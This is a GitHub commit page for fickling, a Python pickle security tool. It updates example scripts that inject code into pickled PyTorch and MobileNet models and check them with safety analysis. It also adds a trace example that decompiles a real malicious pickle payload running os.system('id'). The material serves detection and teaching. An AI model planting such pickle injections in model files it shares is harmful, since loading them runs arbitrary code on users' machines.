Skip to content

Commit

Permalink
Merge pull request #87 from trailofbits/sh/user
Browse files Browse the repository at this point in the history
More usability improvements
  • Loading branch information
suhacker1 authored Jan 3, 2024
2 parents 7d40f1d + 34fed7e commit 4ef7f81
Show file tree
Hide file tree
Showing 10 changed files with 144 additions and 11 deletions.
4 changes: 2 additions & 2 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -16,7 +16,7 @@ Fickling can be used both as a **python library** and a **CLI**.
* [Pickle code injection](#pickle-code-injection)
* [Pickle decompilation](#pickle-decompilation)
* [PyTorch polyglots](#pytorch-polyglots)
* [About pickle](#about-pickle)
* [More information](#more-information)
* [Contact](#contact)

## Installation
Expand Down Expand Up @@ -189,7 +189,7 @@ Your file is most likely of this format: PyTorch v1.3
Check out [our examples](https://github.com/trailofbits/fickling/tree/master/example)
to learn more about using fickling!

## About pickle
## More information

Pickled Python objects are in fact bytecode that is interpreted by a stack-based
virtual machine built into Python called the "Pickle Machine". Fickling can take
Expand Down
9 changes: 9 additions & 0 deletions example/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
# Examples

* [hook_functions.py](https://github.com/trailofbits/fickling/blob/master/example/hook_functions.py): Check the safety of all loaded pickle files using `fickling.always_check_safety()`
* [context_manager.py](https://github.com/trailofbits/fickling/blob/master/example/context_manager.py): Halt the deserialization of a malicious pickle file with the fickling context manager
* [fault_injection.py](https://github.com/trailofbits/fickling/blob/master/example/fault_injection.py): Perform a fault injection on a PyTorch model and then analyze the result with `check_safety`
* [inject_mobilenet.py](https://github.com/trailofbits/fickling/blob/master/example/inject_mobilenet.py): Override the `eval` method of a ML model using fickling and apply `fickling.is_likely_safe` to the model file
* [inject_pytorch.py](https://github.com/trailofbits/fickling/blob/master/example/inject_pytorch.py): Inject a model loaded from a PyTorch file with malicious code using fickling’s PyTorch module
* [numpy_poc.py](https://github.com/trailofbits/fickling/blob/master/example/numpy_poc.py): Analyze a malicious payload passed to `numpy.load()`
* [trace_binary.py](https://github.com/trailofbits/fickling/blob/master/example/trace_binary.py): Decompile a payload using the tracing module
9 changes: 6 additions & 3 deletions example/fault_injection.py
Original file line number Diff line number Diff line change
@@ -1,13 +1,16 @@
"""
This is tutorial code for performing fault injections with PyTorchFi:
https://colab.research.google.com/drive/1BMB4LbsTU_K_YXUFzRyfIynpGu5Yhr1Y
Note you may need to run `pip install pytorchfi`
"""
import pickle

import torch
import torchvision.models as models
from pytorchfi.core import fault_injection

import fickling.analysis as analysis
from fickling.fickle import Pickled

# Load AlexNet
Expand Down Expand Up @@ -61,8 +64,8 @@

print("\n\nIs this is_likely_safe?")

safety = fickled_unsafe_model.check_safety().to_dict()
print(safety)
safety = analysis.check_safety(fickled_unsafe_model).to_dict()
print(safety["severity"])

# Test more safety checks

Expand All @@ -72,7 +75,7 @@
else:
print("❌")

print("Do the AST's match?")
print("Do the ASTs match?")
if fickled_unsafe_model.ast == safe_model.ast:
print("✅")
else:
Expand Down
11 changes: 9 additions & 2 deletions example/inject_mobilenet.py
Original file line number Diff line number Diff line change
Expand Up @@ -2,6 +2,7 @@

import torchvision.models as models

import fickling
from fickling.fickle import Pickled

# Use fickling to override a custom method (.eval())
Expand All @@ -15,13 +16,19 @@
payload = '''exec("""type(model).eval = eval('lambda model: print("!!!!We can run whatever custom Python code we want to!!!!")')""")''' # noqa
fickled_model = Pickled.load(pickle.dumps(model))

# Use the insert_python_exec() method to inject the payload
fickled_model.insert_python_exec(payload)
model = pickle.loads(fickled_model.dumps())

print("Running eval()")
model.eval()
print("Finished running eval()")

# Serialize malicious model
print("\n\nIs this safe?")
safety_results = fickled_model.check_safety().to_dict()
print(safety_results["severity"])
with open("malicious_mobilenet.pkl", "wb") as f:
pickle.dump(model, f)

# Determine if the file is likely safe
result = fickling.is_likely_safe("malicious_mobilenet.pkl")
print(result)
5 changes: 4 additions & 1 deletion example/inject_pytorch.py
Original file line number Diff line number Diff line change
Expand Up @@ -13,7 +13,10 @@
# Inject payload, overwriting the existing file instead of creating a new one
temp_filename = "temp_filename.pt"
result.inject_payload(
"print('Hello, World!')", temp_filename, injection="insertion", overwrite=True
"print('!!!!!!Never trust a pickle!!!!!!')",
temp_filename,
injection="insertion",
overwrite=True,
)

# Load file with injected payload
Expand Down
5 changes: 2 additions & 3 deletions example/numpy_poc.py
Original file line number Diff line number Diff line change
Expand Up @@ -5,6 +5,7 @@

import numpy

import fickling.analysis as analysis
from fickling.fickle import Pickled


Expand All @@ -30,7 +31,5 @@ def __reduce__(self):

fickled_payload = Pickled.load(pickle.dumps(payload))

print("\n\nHow likely is this to be safe?\n\n")
safety_results = fickled_payload.check_safety().to_dict()

safety_results = analysis.check_safety(fickled_payload).to_dict()
print(safety_results)
2 changes: 2 additions & 0 deletions example/pytorch_poc.py
Original file line number Diff line number Diff line change
@@ -1,4 +1,6 @@
"""
Warning: This PoC is out-of-date.
Tested with python3.9
This is tutorial code for generating, saving, and loading models in Pytorch
https://pytorch.org/tutorials/beginner/saving_loading_models.html
Expand Down
88 changes: 88 additions & 0 deletions example/trace_binary.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,88 @@
import io

from astunparse import unparse

import fickling.tracing as tracing
from fickling.fickle import Interpreter, Pickled

# Grab mystery binary object
# This comes from https://github.com/maurosoria/dirsearch/issues/1073
mystery = b"\x80\x04\x95E\x00\x00\x00\x00\x00\x00\x00(\x8c\x08builtins\x8c\x07getattr\x93\x8c\x08builtins\x8c\n__import__\x93\x8c\x02os\x85R\x8c\x06system\x86R\x8c\x02id\x85R1N." # noqa
binary = io.BytesIO(mystery)

# Load using fickling
fickled = Pickled.load(binary)

# Trace and print decompiled output
interpreter = Interpreter(fickled)
trace = tracing.Trace(interpreter)
print(unparse(trace.run()))

"""
Expected Output:
PROTO
FRAME
MARK
Pushed MARK
SHORT_BINUNICODE
Pushed 'builtins'
SHORT_BINUNICODE
Pushed 'getattr'
STACK_GLOBAL
Popped 'getattr'
Popped 'builtins'
Pushed getattr
SHORT_BINUNICODE
Pushed 'builtins'
SHORT_BINUNICODE
Pushed '__import__'
STACK_GLOBAL
Popped '__import__'
Popped 'builtins'
Pushed __import__
SHORT_BINUNICODE
Pushed 'os'
TUPLE1
Popped 'os'
Pushed ('os',)
REDUCE
_var0 = __import__('os')
Popped ('os',)
Popped __import__
Pushed _var0
SHORT_BINUNICODE
Pushed 'system'
TUPLE2
Popped 'system'
Popped _var0
Pushed (_var0, 'system')
REDUCE
_var1 = getattr(_var0, 'system')
Popped (_var0, 'system')
Popped getattr
Pushed _var1
SHORT_BINUNICODE
Pushed 'id'
TUPLE1
Popped 'id'
Pushed ('id',)
REDUCE
_var2 = _var1('id')
Popped ('id',)
Popped _var1
Pushed _var2
POP_MARK
Popped _var2
Popped MARK
NONE
Pushed None
STOP
result = None
Popped None
_var0 = __import__('os')
_var1 = getattr(_var0, 'system')
_var2 = _var1('id')
result = None
"""
9 changes: 9 additions & 0 deletions fickling/exception.py
Original file line number Diff line number Diff line change
Expand Up @@ -6,3 +6,12 @@ def __init__(self, filepath, info):

def __str__(self):
return f"Safety results for {self.filepath} : {str(self.info)}"


class WrongMethodError(Exception):
def __init__(self, msg):
super().__init__()
self.msg = msg

def __str__(self):
return self.msg
13 changes: 13 additions & 0 deletions fickling/fickle.py
Original file line number Diff line number Diff line change
Expand Up @@ -30,6 +30,8 @@
Tuple as TupleType,
)

from fickling.exception import WrongMethodError

T = TypeVar("T")

if sys.version_info < (3, 9):
Expand Down Expand Up @@ -706,6 +708,17 @@ def has_non_setstate_call(self) -> bool:
object.__setstate__"""
return bool(self.properties.non_setstate_calls)

def check_safety(self):
raise WrongMethodError(
"""This method has been removed. Use fickling.analysis.check_safety()
on the Pickled object instead"""
)

def is_likely_safe(self):
raise WrongMethodError(
"This method has been removed. Use fickling.is_likely_safe() on the pickle file instead"
)

def unsafe_imports(self) -> Iterator[Union[ast.Import, ast.ImportFrom]]:
for node in self.properties.imports:
if node.module in (
Expand Down

0 comments on commit 4ef7f81

Please sign in to comment.